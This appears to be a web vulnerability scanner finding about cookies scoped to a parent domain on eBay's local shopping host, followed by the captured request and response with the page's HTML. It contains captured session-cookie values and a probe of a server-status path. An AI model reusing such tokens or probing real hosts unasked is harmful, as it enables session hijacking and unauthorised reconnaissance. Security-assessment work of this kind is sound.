Confidence:   Firm
Host:   http://local.ebay.com
Path:   /server-status

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /server-status HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Dsm%2Bpu%28c5%3Ba6c0-134ac89d7c1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: ebay=%5Ecv%3D15555%5E; Domain=.ebay.com; Path=/
Set-Cookie: s=CgAD4ACBPBpOCYWM4OWQ3YzExMzQwYTQ3YjMyYzFmZTUxZmZmZmU1NmTONQs6; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OCYWM4OWQ3YzExMzQwYTQ3YjMyYzFmZTUxZmZmZmU1NmQAywABTwVJCjHUw9Qq; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:02 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 38312
Date: Thu, 05 Jan 2012 06:24:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - Local</title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;} .srpi {width:435px;} .zipcode{zoom:1;height:100%;z-index:111} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325721178644" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325721178644;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AI9IFZhI*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div class="cont" style="margin-left:0">


<div class="srpbx" id="srpbx">
   <div class="srpbxLft">
   </div>

   <div style="padding:10px 10px 10px 25px"><span style="font-weight:bold;font-size:24px;color:#2F50BC;">Local Shopping <sup style="font-size:11px;color:#000">Beta</sup></span>
       <div style="font:normal small arial;padding-top:5px">Need it fast? Find what you're looking for in a store near you.</div>
   </div>
<!--    <div>
        <div class="srplb">Search locally to find the best deals in your area... <span class="rt">Right now, on eBay</span></div>
   </div>
-->    
   <div style="margin-left:-72px;z-index:5;position:relative;">
       <form action="/local/localsch.html" method="get" id="schfrm" onsubmit="return vjo.ebay.local.localmap.LocalMap.onSubmit();">
           <div class="fm-cnt">
               <div class="srps">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi">
                   <input type="text" id="searchbox" name="_nkw" placeholder="Search locally " autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               <div>                    
                       <span class="near-txt">Near</span><input class="zipcode" autocomplete="off" name="_location" id="_location" value="75217" size="50" title="Enter Location" tabindex="3" placeholder="Enter valid U.S ZIP Code">
                       <div id="autocomplete" class="autocomplete"></div>                        
                   
                       <a href="javascript:;" title="Change Location" type="change" id="loc_change" tabindex="4">Change</a>
                   <span id="err" style="display:none;color:red">Could not find the location.</span>
                   &nbsp;<a href="javascript:;" id="resetloc" style="">| <span>Current Location</span></a>
                   
                   <div class="clr"></div>
               </div>
               <div class="clr"></div>
           </div>
           
           <fontT><div class="srpMar"><b></b><span>Over 50,000 local stores including:</span>
           <span class="ff">
               <span class="fs" id="merchantFs">
           <span class="preS"><a class="pre db" id="pre" href="javascript:;" tabindex="6"></a></span>
       <div class="cntWrap" id="cntWrap1" style="width:252px;overflow:hidden">
    <div class="cnt" id="cnt1" style="width:10000px"><img title="Fry's Electronics" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3040.png"><img title="Best Buy" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1779.png"><img title="Sears" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1609.png"><img title="Micro Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3713.png"><img title="Target" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1792.png"><img title="Staples" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1825.png"><img title="Armani Exchange" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12863.png"><img title="Loft" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12843.png"><img title="Sunglass Hut" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12850.png"><img title="JCPenney" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/6740.png"><img title="Nordstrom" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10390.png"><img title="Ikea" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/8615.png"><img title="Golf Smith" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5461.png"><img title="Office Depot" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1848.png"><img title="Toys R Us" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5893.png"><img title="RadioShack" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1829.png"><img title="Container Store" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12861.png"><img title="Guitar Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/7374.png"><img title="Macy's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10617.png"><img title="GameStop" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/9386.png"><img title="Lowe's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/4483.png">
    </div>
       </div><span class="nextS"><a class="next enab " id="next" href="javascript:;" tabindex="7"></a></span>
       <div class="clr"></div>
               </span>
           </span>
           </div><fontT>
           <input type="hidden" id="_fpos" name="_fpos" value="75217">
           
               <input type="hidden" id="_trksid" name="_trksid" value="p5791.m1">
           
       </form>
   </div>
   <input type="hidden" id="zip" value="75217">
   
   <div style="position:absolute;right:25px;top:30px;color:#333;display:none;" id="loading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif" /></div>
   
   
</div>    

<div id="map_canvas" class="mainmap"></div>

</div></div><div id="linfo" class="loc-info">    
   
   <div>
                               <div class="loc-ttl">
                                   <fontt><a id="ecArr" href="javascript:;"><b></b></a></fontt>
                               </div>
                               <div style="position: absolute; font-size: 10px; right: 10px;">Pricing &amp; inventory <a href="/local/disclaimer.html" target="blank">subject to Terms</a></div>
                               <div id="cntWrapper" class="loc-cntW">
                                   <table id="cntDiv" class="loc-cnt" style="width: 100%;table-layout:fixed" cellpadding="0" cellspacing="0">
                                   <tbody><tr>
                                   
                                       <td class="loc-tkt" align='center' >
                                           <div class="loc-cntTtl" >Popular Products</div>
                                           <div id="fsWrp1" class="loc-fsW" style="min-width:872px;max-width:1136px;" >
                                               <a id="fsLa1" href="javascript:;" class="loc-fsA loc-fsLd"></a>
                                               <div class="rImg">
                                                   <div id="fsCnt1" class="loc-fsCnt" style="min-width:872px;max-width:1136px;" >
                                                       <div id="fsDiv1" class="loc-fsItmW">
                                                       <div class="dealWrap" id="10624313" coords="32.874857,-96.76977,5893,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/010/798/322/200/10798902_14292322_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=10624313&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='The Trash Pack "Trashies" Collectors Tin'>The Trash Pack "Trashies" Collectors Tin</a>
</div><div class="price"><span class="price">$19.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="19578706" coords="33.008115,-96.70534,3040,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/3040.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/014/455/890/200/14455065_19102890_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19578706&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Nerf Vortex Vigilon'>Nerf Vortex Vigilon</a>
</div><div class="price"><span class="price">$18.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="12115369" coords="33.029941,-96.83243,5404,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5404.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/010/800/726/200/10800255_14294726_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=12115369&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Grier Wine Rack'>Grier Wine Rack</a>
</div><div class="price"><span class="price">$39.95</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="3587262" coords="33.020349,-96.714657,12810,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/12810.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/003/673/514/200/3673966_4184514_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=3587262&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Just Dance, Vol. 3'>Just Dance, Vol. 3</a>
</div><div class="price"><span class="price">$9.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="19540378" coords="32.931615,-96.821136,1779,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1779.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/014/413/154/200/14413257_18418154_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19540378&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='NERF - Vortex Vigilon Blaster'>NERF - Vortex Vigilon Blaster</a>
</div><div class="price"><span class="price">$17.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="12117511" coords="32.865543,-96.793953,13363,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/13363.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/108/261/200/11108581_14840261_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=12117511&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Silver Wine Rack'>Silver Wine Rack</a>
</div><div class="price"><span class="price">$44.95</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="12171471" coords="32.91079,-96.95881,9386,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/9386.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/010/824/726/200/10824080_16054726_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=12171471&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Call of Duty Modern Warfare 3 for Nintendo Wii'>Call of Duty Modern Warfare 3 for Nintendo Wii</a>
</div><div class="price"><span class="price">N/A</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="18215399" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/897/871/200/11897168_18107871_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=18215399&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Call of Duty: Modern Warfare 3 (XBOX 360)'>Call of Duty: Modern Warfare 3 (XBOX 360)</a>
</div><div class="price"><span class="price">$59.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="19991032" coords="32.869443,-96.773501,13820,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/13820.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/013/433/413/200/13433677_17136413_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19991032&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='simplehuman Trash Can Liners, Odorsorb "M" 40 Pack'>simplehuman Trash Can Liners, Odorsorb "M" 40 Pack</a>
</div><div class="price"><span class="price">N/A</span>
</div>
</div>
<div class="clr"></div></div>
                                                       </div>
                                                   </div>
                                               </div>
                       
                                               <a id="fsRa1" href="javascript:;" class="loc-fsA loc-fsRa"></a>
                                           </div>
                                       </td>
                                   
                                   
                               </tr>
    &nbs